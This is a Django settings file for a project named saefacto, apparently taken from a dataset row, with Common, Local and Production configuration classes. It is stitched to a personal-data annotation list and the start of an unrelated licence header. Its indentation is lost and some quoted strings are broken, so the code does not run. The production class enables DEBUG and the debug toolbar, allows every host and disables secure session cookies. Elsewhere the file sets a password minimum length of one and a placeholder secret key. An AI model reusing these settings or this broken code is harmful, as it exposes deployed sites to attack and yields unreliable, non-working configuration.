TEMPLATE_DEBUG = DEBUG
########## END DEBUG
########## SECRET CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#secret-key
# Note: This key only used for development and testing.
# In production, this is changed to a values.SecretValue() setting
SECRET_KEY = ""CHANGEME!!!""
########## END SECRET CONFIGURATION
########## FIXTURE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-FIXTURE_DIRS
FIXTURE_DIRS = (
join(BASE_DIR, 'fixtures'),
)
########## END FIXTURE CONFIGURATION
########## EMAIL CONFIGURATION
EMAIL_BACKEND = values.Value('django.core.mail.backends.smtp.EmailBackend')
########## END EMAIL CONFIGURATION
########## MANAGER CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#admins
ADMINS = (
('Fábio C. Barrionuevo da Luz', dummy@email.com'),
)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#managers
MANAGERS = ADMINS
########## END MANAGER CONFIGURATION
########## DATABASE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#databases
DATABASES = values.DatabaseURLValue('postgres://localhost/saefacto')
########## END DATABASE CONFIGURATION
########## CACHING
# Do this here because thanks to django-pylibmc-sasl and pylibmc memcacheify is painful to install on windows.
# memcacheify is what's used in Production
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': ''
}
}
########## END CACHING
########## GENERAL CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#time-zone
TIME_ZONE = 'America/Araguaina'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#language-code
LANGUAGE_CODE = 'pt-br'
LANGUAGES = (
('pt-br', u'Português do Brasil'),
('en', 'English'),
('es', u'Español'),
)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#site-id
SITE_ID = 1
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-i18n
USE_I18N = True
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-l10n
USE_L10N = True
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-tz
USE_TZ = True
########## END GENERAL CONFIGURATION
########## TEMPLATE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-context-processors
TEMPLATE_CONTEXT_PROCESSORS = (
'django.contrib.auth.context_processors.auth',
""allauth.account.context_processors.account"",
""allauth.socialaccount.context_processors.socialaccount"",
'django.core.context_processors.debug',
'django.core.context_processors.i18n',
'django.core.context_processors.media',
'django.core.context_processors.static',
'django.core.context_processors.tz',
'django.contrib.messages.context_processors.messages',
'django.core.context_processors.request',
# Your stuff: custom template context processers go here
)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-dirs
TEMPLATE_DIRS = (
join(BASE_DIR, 'templates'),
)
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
)
# See: http://django-crispy-forms.readthedocs.org/en/latest/install.html#template-packs
CRISPY_TEMPLATE_PACK = 'bootstrap3'
########## END TEMPLATE CONFIGURATION
########## STATIC FILE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#static-root
STATIC_ROOT = join(os.path.dirname(BASE_DIR), 'staticfiles')
# See: https://docs.djangoproject.com/en/dev/ref/settings/#static-url
STATIC_URL = '/static/'
# See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#std:setting-STATICFILES_DIRS
STATICFILES_DIRS = (
join(BASE_DIR, 'static'),
)
# See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#staticfiles-finders
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
########## END STATIC FILE CONFIGURATION
########## MEDIA CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#media-root
MEDIA_ROOT = join(BASE_DIR, 'media')
# See: https://docs.djangoproject.com/en/dev/ref/settings/#media-url
MEDIA_URL = '/media/'
########## END MEDIA CONFIGURATION
########## URL Configuration
ROOT_URLCONF = 'config.urls'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#wsgi-application
WSGI_APPLICATION = 'config.wsgi.application'
########## End URL Configuration
########## AUTHENTICATION CONFIGURATION
AUTHENTICATION_BACKENDS = (
""django.contrib.auth.backends.ModelBackend"",
""allauth.account.auth_backends.AuthenticationBackend"",
)
# Some really nice defaults
ACCOUNT_AUTHENTICATION_METHOD = ""username""
ACCOUNT_EMAIL_REQUIRED = True
ACCOUNT_EMAIL_VERIFICATION = ""mandatory""
ACCOUNT_PASSWORD_MIN_LENGTH = 1
########## END AUTHENTICATION CONFIGURATION
########## Custom user app defaults
# Select the correct user model
AUTH_USER_MODEL = ""users.User""
LOGIN_REDIRECT_URL = ""users:redirect""
########## END Custom user app defaults
########## SLUGLIFIER
AUTOSLUG_SLUGIFY_FUNCTION = ""slugify.slugify""
########## END SLUGLIFIER
########## LOGGING CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#logging
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
########## END LOGGING CONFIGURATION
########## Your common stuff: Below this line define 3rd party libary settings
class Local(Common):
########## DEBUG
DEBUG = values.BooleanValue(True)
TEMPLATE_DEBUG = DEBUG
########## END DEBUG
########## INSTALLED_APPS
INSTALLED_APPS = Common.INSTALLED_APPS
########## END INSTALLED_APPS
########## Mail settings
EMAIL_HOST = ""localhost""
EMAIL_PORT = 1025
EMAIL_BACKEND = values.Value('django.core.mail.backends.console.EmailBackend')
########## End mail settings
########## DATABASE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#databases
#DATABASES = values.DatabaseURLValue('postgres://localhost/projetosgt')
DATABASES = values.DatabaseURLValue('sqlite:////{0}.sqlite'.format(join(BASE_DIR, 'sae_db')))
########## END DATABASE CONFIGURATION
########## django-debug-toolbar
MIDDLEWARE_CLASSES = Common.MIDDLEWARE_CLASSES + ('debug_toolbar.middleware.DebugToolbarMiddleware',)
INSTALLED_APPS += ('debug_toolbar',)
INTERNAL_IPS = ('127.0.0.1',)
DEBUG_TOOLBAR_CONFIG = {
'INTERCEPT_REDIRECTS': False,
'SHOW_TEMPLATE_CONTEXT': True,
}
########## end django-debug-toolbar
########## Your local stuff: Below this line define 3rd party libary settings
#SITETREE_MODEL_TREE = 'sitetree_smartadmin.SmartTree'
SITETREE_MODEL_TREE_ITEM = 'sitetree_smartadmin.SmartTreeItem'
class Production(Common):
########## INSTALLED_APPS
INSTALLED_APPS = Common.INSTALLED_APPS
INSTALLED_APPS += ('allauth.socialaccount.providers.facebook',
'allauth.socialaccount.providers.github', )
########## END INSTALLED_APPS
########## SECRET KEY
SECRET_KEY = values.SecretValue()
########## END SECRET KEY
########## django-secure
INSTALLED_APPS += (""djangosecure"", )
# set this to 60 seconds and then to 518400 when you can prove it works
SECURE_HSTS_SECONDS = 60
SECURE_HSTS_INCLUDE_SUBDOMAINS = values.BooleanValue(True)
SECURE_FRAME_DENY = values.BooleanValue(True)
SECURE_CONTENT_TYPE_NOSNIFF = values.BooleanValue(True)
SECURE_BROWSER_XSS_FILTER = values.BooleanValue(True)
SESSION_COOKIE_SECURE = values.BooleanValue(False)
SESSION_COOKIE_HTTPONLY = values.BooleanValue(True)
SECURE_SSL_REDIRECT = values.BooleanValue(True)
########## end django-secure
########## SITE CONFIGURATION
# Hosts/domain names that are valid for this site
# See https://docs.djangoproject.com/en/1.6/ref/settings/#allowed-hosts
ALLOWED_HOSTS = [""*""]
########## END SITE CONFIGURATION
INSTALLED_APPS += (""gunicorn"", )
########## STORAGE CONFIGURATION
# See: http://django-storages.readthedocs.org/en/latest/index.html
INSTALLED_APPS += (
'storages',
)
# See: http://django-storages.readthedocs.org/en/latest/backends/amazon-S3.html#settings
STATICFILES_STORAGE = DEFAULT_FILE_STORAGE = 'storages.backends.s3boto.S3BotoStorage'
# See: http://django-storages.readthedocs.org/en/latest/backends/amazon-S3.html#settings
AWS_ACCESS_KEY_ID = values.SecretValue()
AWS_SECRET_ACCESS_KEY = values.SecretValue()
AWS_STORAGE_BUCKET_NAME = values.SecretValue()
AWS_AUTO_CREATE_BUCKET = True
AWS_QUERYSTRING_AUTH = False
# see: https://github.com/antonagestam/collectfast
AWS_PRELOAD_METADATA = True
INSTALLED_APPS += (""collectfast"", )
# AWS cache settings, don't change unless you know what you're doing:
AWS_EXPIREY = 60 * 60 * 24 * 7
AWS_HEADERS = {
'Cache-Control': 'max-age=%d, s-maxage=%d, must-revalidate' % (AWS_EXPIREY,
AWS_EXPIREY)
}
# See: https://docs.djangoproject.com/en/dev/ref/settings/#static-url
STATIC_URL = 'https://s3.amazonaws.com/%s/' % AWS_STORAGE_BUCKET_NAME
########## END STORAGE CONFIGURATION
########## EMAIL
DEFAULT_FROM_EMAIL = values.Value(
'saefacto dummy@email.com')
EMAIL_HOST = values.Value('smtp.sendgrid.com')
EMAIL_HOST_PASSWORD = values.SecretValue(environ_prefix="""", environ_name=""SENDGRID_PASSWORD"")
EMAIL_HOST_USER = values.SecretValue(environ_prefix="""", environ_name=""SENDGRID_USERNAME"")
EMAIL_PORT = values.IntegerValue(587, environ_prefix="""", environ_name=""EMAIL_PORT"")
EMAIL_SUBJECT_PREFIX = values.Value('[saefacto] ', environ_name=""EMAIL_SUBJECT_PREFIX"")
EMAIL_USE_TLS = True
SERVER_EMAIL = EMAIL_HOST_USER
########## END EMAIL
########## TEMPLATE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-dirs
TEMPLATE_LOADERS = (
('django.template.loaders.cached.Loader', (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
)),
)
########## END TEMPLATE CONFIGURATION
########## CACHING
# Only do this here because thanks to django-pylibmc-sasl and pylibmc memcacheify is painful to install on windows.
try:
# See: https://github.com/rdegges/django-heroku-memcacheify
from memcacheify import memcacheify
CACHES = memcacheify()
except ImportError:
CACHES = values.CacheURLValue(default=""memcached://127.0.0.1:11211"")
########## END CACHING
########## Your production stuff: Below this line define 3rd party libary settings
########## DEBUG
DEBUG = values.BooleanValue(True)
TEMPLATE_DEBUG = DEBUG
########## END DEBUG
########## django-debug-toolbar
MIDDLEWARE_CLASSES = Common.MIDDLEWARE_CLASSES + ('debug_toolbar.middleware.DebugToolbarMiddleware',)
INSTALLED_APPS += ('debug_toolbar',)
INTERNAL_IPS = ('127.0.0.1',)
DEBUG_TOOLBAR_CONFIG = {
'DISABLE_PANELS': ['debug_toolbar.panels.redirects.RedirectsPanel'],
'SHOW_TEMPLATE_CONTEXT': True,
}
########## end django-debug-toolbar
#######################################################################################
# hack terrivelmente feio para fazer o Pycharm identificar as bibliotecas
# o codigo abaixo nunca sera executado
if 1 == 2:
INSTALLED_APPS = (
# Default Django apps:
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
# Useful template tags:
# 'django.contrib.humanize',
# Admin
'django.contrib.admin',
'south', # Database migration helpers:
'crispy_forms', # Form layouts
'avatar', # for user avatars
'sitetree',
'sitetree_smartadmin',
'django_user_agents',
'statici18n', # javascript
'users', # custom users app
'core',
'main',
# Needs to come last for now because of a weird edge case between
# South and allauth
'allauth', # registration
'allauth.account', # registration
'allauth.socialaccount', # registration
)
########## END APP CONFIGURATION
########## MIDDLEWARE CONFIGURATION
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
########## END MIDDLEWARE CONFIGURATION
########## DEBUG
# See: https://docs.djangoproject.com/en/dev/ref/settings/#debug
DEBUG = True
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-debug
TEMPLATE_DEBUG = DEBUG
########## END DEBUG
########## SECRET CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#secret-key
# Note: This key only used for development and testing.
# In production, this is changed to a values.SecretValue() setting
SECRET_KEY = ""CHANGEME!!!""
########## END SECRET CONFIGURATION
########## FIXTURE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-FIXTURE_DIRS
FIXTURE_DIRS = (
join(BASE_DIR, 'fixtures'),
)
########## END FIXTURE CONFIGURATION
########## EMAIL CONFIGURATION
EMAIL_BACKEND = values.Value('django.core.mail.backends.smtp.EmailBackend')
########## END EMAIL CONFIGURATION
########## MANAGER CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#admins
ADMINS = (
('Fábio C. Barrionuevo da Luz', dummy@email.com'),
)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#managers
MANAGERS = ADMINS
########## END MANAGER CONFIGURATION
########## DATABASE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#databases
########## END DATABASE CONFIGURATION
########## CACHING
# Do this here because thanks to django-pylibmc-sasl and pylibmc memcacheify is painful to install on windows.
# memcacheify is what's used in Production
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': ''
}
}
########## END CACHING
########## GENERAL CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#time-zone
TIME_ZONE = 'America/Los_Angeles'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#language-code
LANGUAGE_CODE = 'en-us'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#site-id
SITE_ID = 1
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-i18n
USE_I18N = True
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-l10n
USE_L10N = True
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-tz
USE_TZ = True
########## END GENERAL CONFIGURATION
########## TEMPLATE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-context-processors
TEMPLATE_CONTEXT_PROCESSORS = (
'django.contrib.auth.context_processors.auth',
""allauth.account.context_processors.account"",
""allauth.socialaccount.context_processors.socialaccount"",
'django.core.context_processors.debug',
'django.core.context_processors.i18n',
'django.core.context_processors.media',
'django.core.context_processors.static',
'django.core.context_processors.tz',
'django.contrib.messages.context_processors.messages',
'django.core.context_processors.request',
# Your stuff: custom template context processers go here
)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-dirs
TEMPLATE_DIRS = (
join(BASE_DIR, 'templates'),
)
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
)
# See: http://django-crispy-forms.readthedocs.org/en/latest/install.html#template-packs
CRISPY_TEMPLATE_PACK = 'bootstrap3'
########## END TEMPLATE CONFIGURATION
########## STATIC FILE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#static-root
STATIC_ROOT = join(os.path.dirname(BASE_DIR), 'staticfiles')
# See: https://docs.djangoproject.com/en/dev/ref/settings/#static-url
STATIC_URL = '/static/'
# See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#std:setting-STATICFILES_DIRS
STATICFILES_DIRS = (
join(BASE_DIR, 'static'),
)
# See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#staticfiles-finders
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
########## END STATIC FILE CONFIGURATION
########## MEDIA CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#media-root
MEDIA_ROOT = join(BASE_DIR, 'media')
# See: https://docs.djangoproject.com/en/dev/ref/settings/#media-url
MEDIA_URL = '/media/'
########## END MEDIA CONFIGURATION
########## URL Configuration
ROOT_URLCONF = 'config.urls'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#wsgi-application
WSGI_APPLICATION = 'config.wsgi.application'
########## End URL Configuration
########## AUTHENTICATION CONFIGURATION
AUTHENTICATION_BACKENDS = (
""django.contrib.auth.backends.ModelBackend"",
""allauth.account.auth_backends.AuthenticationBackend"",
)
# Some really nice defaults
ACCOUNT_AUTHENTICATION_METHOD = ""username""
ACCOUNT_EMAIL_REQUIRED = True
ACCOUNT_EMAIL_VERIFICATION = ""mandatory""
########## END AUTHENTICATION CONFIGURATION
########## Custom user app defaults
# Select the correct user model
AUTH_USER_MODEL = ""users.User""
LOGIN_REDIRECT_URL = ""users:redirect""
########## END Custom user app defaults
########## SLUGLIFIER
AUTOSLUG_SLUGIFY_FUNCTION = ""slugify.slugify""
########## END SLUGLIFIER
########## LOGGING CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#logging
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
########## END LOGGING CONFIGURATION
########## Your common stuff: Below this line define 3rd party libary settings
",24139,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#std:setting-STATICFILES_DIRS'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#wsgi-application'], ['IP_ADDRESS', '127.0.0.1'], ['URL', ""https://s3.amazonaws.com/%s/'""], ['IP_ADDRESS', '127.0.0.1'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#std:setting-STATICFILES_DIRS'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#wsgi-application'], ['PERSON', 'https://docs.djangoproject.com/en/dev/topics/settings/'], ['LOCATION', 'django.contrib.messages'], ['PERSON', 'LOCAL_APPS'], ['LOCATION', 'South'], ['PERSON', 'AuthenticationMiddleware'], ['PERSON', 'XFrameOptionsMiddleware'], ['NRP', 'SECRET_KEY'], ['PERSON', ""Fábio C. Barrionuevo da Luz'""], ['PERSON', 'pylibmc memcacheify'], ['PERSON', 'LocMemCache'], ['LOCATION', 'CRISPY_TEMPLATE_PACK'], ['PERSON', 'MEDIA_ROOT'], ['URL', 'config.ws'], ['PERSON', 'EMAIL_PORT'], ['LOCATION', 'projetosgt'], ['PERSON', 'sae_db'], ['PERSON', 'INTERCEPT_REDIRECTS'], ['PERSON', 'SITETREE_MODEL_TREE_ITEM'], ['PERSON', 'SmartTreeItem'], ['NRP', 'SECRET_KEY'], ['DATE_TIME', 'this to 60 seconds'], ['NRP', 'SECURE_CONTENT_TYPE_NOSNIFF'], ['LOCATION', 'AWS_SECRET_ACCESS_KEY'], ['PERSON', 'AWS_STORAGE_BUCKET_NAME'], ['LOCATION', 'https://s3.amazonaws.com/%s/'], ['PERSON', 'EMAIL_PORT'], ['PERSON', 'SERVER_EMAIL = EMAIL_HOST_USER'], ['PERSON', 'pylibmc memcacheify'], ['PERSON', 'terrivelmente feio para fazer o Pycharm'], ['LOCATION', 'django.contrib.messages'], ['LOCATION', 'South'], ['PERSON', 'AuthenticationMiddleware'], ['PERSON', 'XFrameOptionsMiddleware'], ['NRP', 'SECRET_KEY'], ['PERSON', ""Fábio C. Barrionuevo da Luz'""], ['PERSON', 'pylibmc memcacheify'], ['PERSON', 'LocMemCache'], ['LOCATION', 'CRISPY_TEMPLATE_PACK'], ['PERSON', 'MEDIA_ROOT'], ['URL', 'config.ws'], ['URL', 'https://docs.djangoproject.com/en/dev/topics/settings/'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/'], ['URL', 'http://django-storages.readthedocs.org/en/latest/backends/amazon-S3.html#settings'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#installed-apps'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#debug'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#template-debug'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#secret-key'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-FIXTURE_DIRS'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#admins'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#managers'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#databases'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#time-zone'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#language-code'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#site-id'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#use-i18n'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#use-l10n'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#use-tz'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#template-context-processors'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#template-dirs'], ['URL', 'http://django-crispy-forms.readthedocs.org/en/latest/install.html#template-packs'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#static-root'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#static-url'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#staticfiles-finders'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#media-root'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#media-url'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#logging'], ['URL', 'http://docs.djangoproject.com/en/dev/topics/logging'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#databases'], ['URL', 'https://docs.djangoproject.com/en/1.6/ref/settings/#allowed-hosts'], ['URL', 'http://django-storages.readthedocs.org/en/latest/index.html'], ['URL', 'http://django-storages.readthedocs.org/en/latest/backends/amazon-S3.html#settings'], ['URL', 'http://django-storages.readthedocs.org/en/latest/backends/amazon-S3.html#settings'], ['URL', 'https://github.com/antonagestam/collectfast'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#static-url'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#template-dirs'], ['URL', 'https://github.com/rdegges/django-heroku-memcacheify'], ['IP_ADDRESS', '127.0.0.1'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#debug'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#template-debug'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#secret-key'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-FIXTURE_DIRS'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#admins'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#managers'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#databases'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#time-zone'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#language-code'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#site-id'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#use-i18n'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#use-l10n'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#use-tz'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#template-context-processors'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#template-dirs'], ['URL', 'http://django-crispy-forms.readthedocs.org/en/latest/install.html#template-packs'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#static-root'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#static-url'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#staticfiles-finders'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#media-root'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#media-url'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#logging'], ['URL', 'http://docs.djangoproject.com/en/dev/topics/logging'], ['URL', 'os.path.jo'], ['URL', 'os.pa'], ['URL', 'CallingFormat.SU'], ['URL', 'os.pa'], ['URL', 'os.pa'], ['URL', 'django.contrib.au'], ['URL', 'django.contrib.co'], ['URL', 'django.contrib.se'], ['URL', 'django.contrib.si'], ['URL', 'django.contrib.me'], ['URL', 'django.contrib.st'], ['URL', 'django.contrib.hu'], ['URL', 'django.contrib.ad'], ['URL', 'django.contrib.ad'], ['URL', 'allauth.ac'], ['URL', 'allauth.so'], ['URL', 'django.contrib.sessions.middleware.Se'], ['URL', 'django.middleware.common.Com'], ['URL', 'django.contrib.auth.middleware.Au'], ['URL', 'django.contrib.messages.middleware.Me'], ['URL', 'django.middleware.cl'], ['URL', 'agents.middleware.Us'], ['URL', 'values.Bo'], ['URL', 'values.Se'], ['URL', 'values.Va'], ['URL', 'django.core.mail.backends.sm'], ['URL', 'email.com'], ['URL', 'django.core.cache.ba'], ['URL', 'django.contrib.auth.co'], ['URL', 'processors.au'], ['URL', 'allauth.account.co'], ['URL', 'processors.ac'], ['URL', 'allauth.socialaccount.co'], ['URL', 'processors.so'], ['URL', 'django.core.co'], ['URL', 'processors.de'], ['URL', 'django.core.co'], ['URL', 'django.core.co'], ['URL', 'processors.me'], ['URL', 'django.core.co'], ['URL', 'processors.st'], ['URL', 'django.core.co'], ['URL', 'processors.tz'], ['URL', 'django.contrib.messages.co'], ['URL', 'processors.me'], ['URL', 'django.core.co'], ['URL', 'processors.re'], ['URL', 'django.template.loaders.fi'], ['URL', 'os.pa'], ['URL', 'django.contrib.staticfiles.finders.Fi'], ['URL', 'django.contrib.staticfiles.fi'], ['URL', 'django.contrib.auth.backends.Mo'], ['URL', 'allauth.account.au'], ['URL', 'backends.Au'], ['URL', 'users.Us'], ['URL', 'slugify.sl'], ['URL', 'django.utils.log.Re'], ['URL', 'django.utils.log.Ad'], ['URL', 'django.re'], ['URL', 'values.Bo'], ['URL', 'Common.IN'], ['URL', 'values.Va'], ['URL', 'django.core.mail.backends.co'], ['URL', 'toolbar.middleware.De'], ['URL', 'smartadmin.Sm'], ['URL', 'smartadmin.Sm'], ['URL', 'Common.IN'], ['URL', 'allauth.socialaccount.pro'], ['URL', 'allauth.socialaccount.providers.gi'], ['URL', 'values.Se'], ['URL', 'values.Bo'], ['URL', 'values.Bo'], ['URL', 'values.Bo'], ['URL', 'values.Bo'], ['URL', 'values.Bo'], ['URL', 'values.Bo'], ['URL', 'values.Bo'], ['URL', 'storages.ba'], ['URL', 'values.Se'], ['URL', 'values.Se'], ['URL', 'values.Se'], ['URL', 'values.Va'], ['URL', 'email.com'], ['URL', 'values.Va'], ['URL', 'smtp.sendgrid.com'], ['URL', 'values.Se'], ['URL', 'values.Se'], ['URL', 'values.Int'], ['URL', 'values.Va'], ['URL', 'django.template.loaders.ca'], ['URL', 'django.template.loaders.fi'], ['URL', 'values.Ca'], ['URL', 'values.Bo'], ['URL', 'toolbar.middleware.De'], ['URL', 'toolbar.panels.redirects.Red'], ['URL', 'django.contrib.au'], ['URL', 'django.contrib.co'], ['URL', 'django.contrib.se'], ['URL', 'django.contrib.si'], ['URL', 'django.contrib.me'], ['URL', 'django.contrib.st'], ['URL', 'django.contrib.hu'], ['URL', 'django.contrib.ad'], ['URL', 'allauth.ac'], ['URL', 'allauth.so'], ['URL', 'django.contrib.sessions.middleware.Se'], ['URL', 'django.middleware.common.Com'], ['URL', 'django.contrib.auth.middleware.Au'], ['URL', 'django.contrib.messages.middleware.Me'], ['URL', 'django.middleware.cl'], ['URL', 'values.Se'], ['URL', 'values.Va'], ['URL', 'django.core.mail.backends.sm'], ['URL', 'email.com'], ['URL', 'django.core.cache.ba'], ['URL', 'django.contrib.auth.co'], ['URL', 'processors.au'], ['URL', 'allauth.account.co'], ['URL', 'processors.ac'], ['URL', 'allauth.socialaccount.co'], ['URL', 'processors.so'], ['URL', 'django.core.co'], ['URL', 'processors.de'], ['URL', 'django.core.co'], ['URL', 'django.core.co'], ['URL', 'processors.me'], ['URL', 'django.core.co'], ['URL', 'processors.st'], ['URL', 'django.core.co'], ['URL', 'processors.tz'], ['URL', 'django.contrib.messages.co'], ['URL', 'processors.me'], ['URL', 'django.core.co'], ['URL', 'processors.re'], ['URL', 'django.template.loaders.fi'], ['URL', 'os.pa'], ['URL', 'django.contrib.staticfiles.finders.Fi'], ['URL', 'django.contrib.staticfiles.fi'], ['URL', 'django.contrib.auth.backends.Mo'], ['URL', 'allauth.account.au'], ['URL', 'backends.Au'], ['URL', 'users.Us'], ['URL', 'slugify.sl'], ['URL', 'django.utils.log.Re'], ['URL', 'django.utils.log.Ad'], ['URL', 'django.re']]"
72,"# Copyright (C) 2015 Pure Storage, Inc.
#
# Licensed under the Apache License, Version 2.0 (the ""License""); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
